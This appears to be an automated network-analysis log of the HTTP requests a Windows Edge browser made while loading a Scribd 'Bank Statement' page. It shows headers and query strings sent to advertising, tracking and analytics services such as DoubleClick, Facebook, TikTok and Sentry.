Source: global trafficHTTP traffic detected: GET /i/adsct?bci=3&dv=America%2FNew_York%26en-GB%2Cen%2Cen-US%26Google%20Inc.%26Win32%26255%261280%261024%264%2624%261280%26984%260%26na&eci=2&event_id=ae570e5b-7408-44c7-a275-b9d7e6499f48&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=57523e79-2d85-47d3-af35-a39e11e7d0a2&tw_document_href=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=nzbvs&type=javascript&version=2.3.31 HTTP/1.1Host: t.coConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /getuid?ld=1&gdpr=0&cmp_cs=&us_privacy=&redir=https%3A%2F%2Fi.liadm.com%2Fs%2F88342%3Fbidder_id%3D246498%26bidder_uuid%3D%24UID HTTP/1.1Host: eb2.3lift.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://i.liadm.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: tluidp=1275989254868253457531
Source: global trafficHTTP traffic detected: GET /bounce?%2Fgetuid%3Fhttps%3A%2F%2Fi.liadm.com%2Fs%2F81081%3Fbidder_id%3D91218%26bidder_uuid%3D%24UID%26gdpr%3D0 HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://i.liadm.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: XANDR_PANID=yoDWIi40QA0l92CMfnRGTVK6j8ph7xMEE2hovwWpxM3jlu8-JszEEuNouxtI9R3D-QUOCwsGww6GCGm89qzRlyyUz_8TuJUoh7BvVk-kenM.; receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /s/53233?bidder_id=183658&bidder_uuid=9028781667127667262 HTTP/1.1Host: i.liadm.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://i.liadm.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /track/cmb/generic?ttd_pid=liveintent&ttd_tpi=1&gdpr=0 HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://i.liadm.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /usersync/liveintent/?cb=%2F%2Fi.liadm.com%2Fs%2F35004%3Fbidder_id%3D98254%26bidder_uuid%3D__ZUID__&s=2 HTTP/1.1Host: b1sync.outbrain.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://i.liadm.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /cm?pub=39342&in=1&userid=9fa5f896-689e-4e02-892e-586e4b3d39e8%3A1739863015.260034&forward=https%3A//i.liadm.com/s/56409%3Fbidder_id%3D200442%26bidder_uuid%3D9fa5f896-689e-4e02-892e-586e4b3d39e8%253A1739863015.260034%26pid%3D500040%26it%3D1%26iv%3D9fa5f896-689e-4e02-892e-586e4b3d39e8%253A1739863015.260034%26_%3D1739863015.2620804&cb=1739863015.2621722 HTTP/1.1Host: p.rfihub.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://i.liadm.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/991817613/?random=1739863013890&cv=11&fst=1739863013890&bg=ffffff&guid=ON&async=1&gtm=45be52d0v9178425511z878386455za201zb9101043253&gcd=13l3l3l3l1l1&dma=0&tag_exp=102067808~102482432~102539968~102556566~102558064~102587591~102605417~102640599&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&hn=www.googleadservices.com&frm=0&tiba=Bank%20Statement%20%7C%20PDF%20%7C%20Debit%20Card%20%7C%20Automated%20Teller%20Machine&npa=0&pscdl=noapi&auid=940495529.1739863009&uaa=x86&uab=64&uafvl=Microsoft%2520Edge%3B117.0.2045.47%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fdr=QA&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: POST /api/282187/envelope/?sentry_key=21588782029b459685064c03453673ff&sentry_version=7&sentry_client=sentry.javascript.browser%2F7.19.0 HTTP/1.1Host: sentry.ioConnection: keep-aliveContent-Length: 510sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /tag/js/gpt.js?network_code=22797863291 HTTP/1.1Host: securepubads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /tr/?id=287045611447707&ev=PageView&dl=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&rl=&if=false&ts=1739863014755&sw=1280&sh=1024&v=2.9.183&r=stable&a=tmSimo-GTM-WebTemplate&ec=0&o=12318&fbp=fb.1.1739863014750.626798575259924062&cs_est=true&ler=empty&it=1739863012215&coo=false&tm=1&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: POST /api/v2/pixel HTTP/1.1Host: analytics.tiktok.comConnection: keep-aliveContent-Length: 1255sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _ttp=2tCjaG9bXmYux1DJ121zI6Lcamx
Source: global trafficHTTP traffic detected: POST /api/v2/pixel/act HTTP/1.1Host: analytics.tiktok.comConnection: keep-aliveContent-Length: 2891sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _ttp=2tCjaG9bXmYux1DJ121zI6Lcamx
Source: global trafficHTTP traffic detected: POST /g/collect?v=2&tid=G-8KZ8BV0P5W&cid=490258883.1739863012&gtm=45je52d0v9101042369z878386455za200zb78386455&aip=1&dma=0&gcd=13l3l3l3l1l1&npa=0&frm=0&tag_exp=102067808~102482433~102539968~102556565~102558064~102587591~102605417~102640600 HTTP/1.1Host: stats.g.doubleclick.netConnection: keep-aliveContent-Length: 0sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: POST /g/collect?v=2&_ng=1&tid=G-Z4ZC50DED6&cid=490258883.1739863012&gtm=45je52d0v9101043253z878386455za200zb78386455&aip=1&dma=0&gcd=13l3l3l3l1l1&npa=0&frm=0&tag_exp=102067808~102482432~102539968~102556566~102558064~102587591~102605417~102640600 HTTP/1.1Host: stats.g.doubleclick.netConnection: keep-aliveContent-Length: 0sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: POST /pagead/form-data/991817613?gtm=45be52d0pfv9178425511z878386455za201zb9101043253&gcd=13l3l3l3l1l1&dma=0&tag_exp=102067808~102482432~102539968~102556566~102558064~102587591~102605417~102640599&npa=0&frm=0&pscdl=noapi&auid=940495529.1739863009&uaa=x86&uab=64&uafvl=Microsoft%2520Edge%3B117.0.2045.47%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&ec_mode=a&em=tv.1 HTTP/1.1Host: google.comConnection: keep-aliveContent-Length: 0sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: POST /ccm/form-data/991817613?gtm=45be52d0pfv9178425511z878386455za201zb9101043253&gcd=13l3l3l3l1l1&dma=0&tag_exp=102067808~102482432~102539968~102556566~102558064~102587591~102605417~102640599&npa=0&frm=0&pscdl=noapi&auid=940495529.1739863009&uaa=x86&uab=64&uafvl=Microsoft%2520Edge%3B117.0.2045.47%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&ec_mode=a&em=tv.1 HTTP/1.1Host: google.comConnection: keep-aliveContent-Length: 0sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: OPTIONS /?k=0&d=scribd.com&t=desktop&c=US&r=19 HTTP/1.1Host: optimise.netConnection: keep-aliveAccept: */*Access-Control-Request-Method: GETAccess-Control-Request-Headers: x-api-key,x-lmOrigin: https://www.scribd.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Sec-Fetch-Mode: corsSec-Fetch-Site: cross-siteSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /1d0fec24-9622-4770-a71d-6dd2fd3e4842/launchpad-liveramp.js HTTP/1.1Host: launchpad-wrapper.privacymanager.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /qaKtxuL1KR_2Tfmz0NmPaAudsBc/gpt_and_prebid/config.js HTTP/1.1Host: cdn.confiant-integrations.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: OPTIONS /v2/c HTTP/1.1Host: c.pub.networkConnection: keep-aliveAccept: */*Access-Control-Request-Method: POSTAccess-Control-Request-Headers: content-typeOrigin: https://www.scribd.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Sec-Fetch-Mode: corsSec-Fetch-Site: cross-siteSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /latest/launchpad.bundle.js HTTP/1.1Host: launchpad.privacymanager.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /v3/m-outer-3437aaddcdf6922d623e172c2d6f9278.html HTTP/1.1Host: js.stripe.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /hadron.js?url=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&ref=&_it=freestar&partner_id=474&ha=_hadron HTTP/1.1Host: cdn.hadronid.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /aax2/apstag.js HTTP/1.1Host: c.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /gallery.js HTTP/1.1Host: freestar-io.videoplayerhub.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /v1/envelope?pid=0013300001cFpYHAA0&gdpr=0&src=pbjs&ver=9.23.0&coppa=0 HTTP/1.1Host: lexicon.33across.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47content-type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /api/identity/envelope?pid=106 HTTP/1.1Host: api.rlcdn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47content-type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /api/v1/pbhid?partner_id=474&_it=prebid&t=1&src=id&domain=www.scribd.com HTTP/1.1Host: id.hadron.ad.gtConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47content-type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: OPTIONS / HTTP/1.1Host: geo.privacymanager.ioConnection: keep-aliveAccept: */*Access-Control-Request-Method: GETAccess-Control-Request-Headers: content-typeOrigin: https://www.scribd.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Sec-Fetch-Mode: corsSec-Fetch-Site: cross-siteSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /live/liveView.php?s=115858&cbuster=1739863019&pubUrl=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&x=400&y=272&playerApiId=freestarPrimisPlayer&schain=1.0,1!freestar.com,1651,1 HTTP/1.1Host: live.primis.techConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: POST /api/config/prebid HTTP/1.1Host: id5-sync.comConnection: keep-aliveContent-Length: 167sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: POST /api/config/prebid HTTP/1.1Host: id5-sync.comConnection: keep-aliveContent-Length: 167sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
